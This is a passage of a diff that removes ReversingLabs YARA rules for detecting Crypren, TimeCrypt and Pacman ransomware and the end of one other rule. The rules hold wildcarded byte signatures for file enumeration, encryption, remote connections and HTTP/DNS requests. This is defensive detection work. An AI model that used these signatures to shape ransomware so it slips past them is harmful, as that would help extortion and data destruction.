-		importance = 25
-
-	strings:
-		$find_files = {
-            FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D
-            85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E
-            5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85
-            C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8B 3D ?? ?? ??
-            ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ??
-            ?? ?? ?? ?? FF D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B D8 83 FB ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            5F 5E 5B 8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 53 8B 5D ?? 57 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 0F 8B
-            C1 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4F ?? 83 C4 ?? 8B C1 83 E8 ?? 74 ?? 83
-            E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? 83 F8 ?? 77 ?? FF 24 85 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 83 7F ?? ?? 75 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF
-            77 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 FF 77 ?? 56 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 45 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 5E FF 77 ?? 53 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5B
-            5D C3
-        }
-		$encrypt_files = {
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B C8 8B F2 83 C4 ?? 2B CE 8D 71 ??
-            66 90 0F B7 0A 8D 52 ?? 66 89 4C 32 ?? 66 85 C9 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 47 89 7D ?? E9 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ??
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53
-            FF D6 8B 3D ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ??
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 53
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5
-            5D C3
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
-}
-rule REVERSINGLABS_Win32_Ransomware_Crypren : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Crypren ransomware."
-		author = "ReversingLabs"
-		id = "9a6ff190-b26b-5b75-9103-95a3b2e80701"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Crypren.yara#L1-L144"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7047d48782762e42544063fde6f2be62eb19f22853ea84abb5bce67c962da172"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Crypren"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$enum_directories_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
-            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
-            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-        }
-		$enum_directories_p2 = {
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6
-            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6
-        }
-		$enum_directories_p3 = {
-            45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 90 83 7F ?? ?? 8B 5F ?? 72 ?? 8B 37 EB ?? 8B F7 83 7D ?? ?? 8D
-            45 ?? 8B D3 0F 43 45 ?? 3B CB 0F 42 D1 85 D2 74 ?? 83 EA ?? 72 ?? 8D 9B ?? ?? ?? ??
-            8B 08 3B 0E 75 ?? 83 C0 ?? 83 C6 ?? 83 EA ?? 73 ?? 83 FA ?? 74 ?? 8A 08 3A 0E 75 ??
-            83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA
-            ?? 74 ?? 8A 40 ?? 3A 46 ?? 74 ?? 1B C0 83 C8 ?? EB ?? 33 C0 8B 4D ?? 85 C0 75 ?? 3B
-            CB 73 ?? 83 C8 ?? EB ?? 33 C0 3B CB 0F 95 C0 85 C0 0F 94 C0 84 C0 75 ?? 8B 85 ?? ??
-            ?? ?? 83 C7 ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? B3 ?? EB ?? 32 DB 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ??
-            72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 33 FF C6 45 ?? ?? 83 7D ?? ?? 8D 45 ?? 6A
-            ?? 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ??
-            0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B
-            94 0D ?? ?? ?? ?? 85 D2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 39 BC 05 ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? F6 C2 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 03 C8 8D 45 ??
-            50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? C6 45 ?? ?? 8B F0
-            85 C9 74 ?? 8B 11 FF 52 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B
-            40 ?? FF D0 88 45 ?? 8D 45 ?? FF 75 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 76 ?? EB ?? 8D A4 24
-            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 0F 43 4D ?? 33 D2
-        }
-		$encrypt_files_p2 = {
-            0F BE 1C 30 8B C7 F7 75 ?? 8A 0C 0A 0F BE C1 03 C3 3D ?? ?? ?? ?? 7C ?? 25 ?? ?? ??
-            ?? 79 ?? 48 0D ?? ?? ?? ?? 40 EB ?? 02 D9 0F B6 C3 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 46 83 C4 ?? 47 3B 75 ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 72
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
-            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C6 45 ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D
-            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$enum_drives_p1 = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
-        }
-		$enum_drives_p2 = {
-            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D
-            4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68
-            ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $enum_directories_p* ) ) and ( all of ( $enum_drives_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
-}
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Timecrypt : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects TimeCrypt ransomware."
-		author = "ReversingLabs"
-		id = "38a0c383-8be6-5258-aa93-0cf09b18e5f7"
-		date = "2021-12-06"
-		modified = "2021-12-06"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.TimeCrypt.yara#L1-L69"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6849d6d5010d7bcb4052c10d5bd7cc29320ffc986f36289b272a1e9a8d14fab9"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "TimeCrypt"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$find_files = {
-            7E ?? ?? ?? ?? 0A 16 0B 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 0D 09 08 7D ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 09
-            28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ??
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 2C ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 1F ?? 28 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 2A 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 26 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 26 07 17 58 0B 07 06 8E 69 3F ?? ?? ?? ?? 2A
-        }
-		$encrypt_files = {
-            02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 73 ?? ?? ?? ?? 0A 06 03 6F ?? ?? ?? ?? 06 02 6F
-            ?? ?? ?? ?? 26 06 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F
-            ?? ?? ?? ?? DC 02 17 28 ?? ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-		$send_http_request = {
-            1C 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19
-            03 A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 04 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0A 73 ?? ?? ??
-            ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A
-        }
-		$send_dns_request = {
-            1C 8D ?? ?? ?? ?? 25 16 04 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 03 A2 25 19
-            72 ?? ?? ?? ?? A2 25 1A 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
-            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            26 DE ?? 26 DE ?? 2A
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $send_http_request ) and ( $send_dns_request )
-}
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Pacman : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Pacman ransomware."
-		author = "ReversingLabs"
-		id = "a440769b-030b-5b72-a6f2-cf478dd7acd2"
-		date = "2021-08-12"
-		modified = "2021-08-12"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Pacman.yara#L1-L68"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0634303a4db2631edb40a9435444f3bdc4bc6eb745c7e43a54478e54e7507403"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Pacman"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$pacman_find_encrypted_1 = {
-            28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 28
-            29 02 00 06 1F 1C 28 0E 04 00 06 [0-2] 7E 13 00 00 04 20 0F 03 00 00 28 2F 00 00 06 25
-            26 28 5D 02 00 06 [0-2] 28 6D 01 00 06 [0-2] 0B 07 13 06 16 13 05 2B 31 11 06 11 05 9A
-            0C 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2]
-            08 28 55 02 00 06 [0-2] 26 11 05 17 D6 13 05 11 05 11 06 8E B7 32 C7 1D 45 01 00 00 00
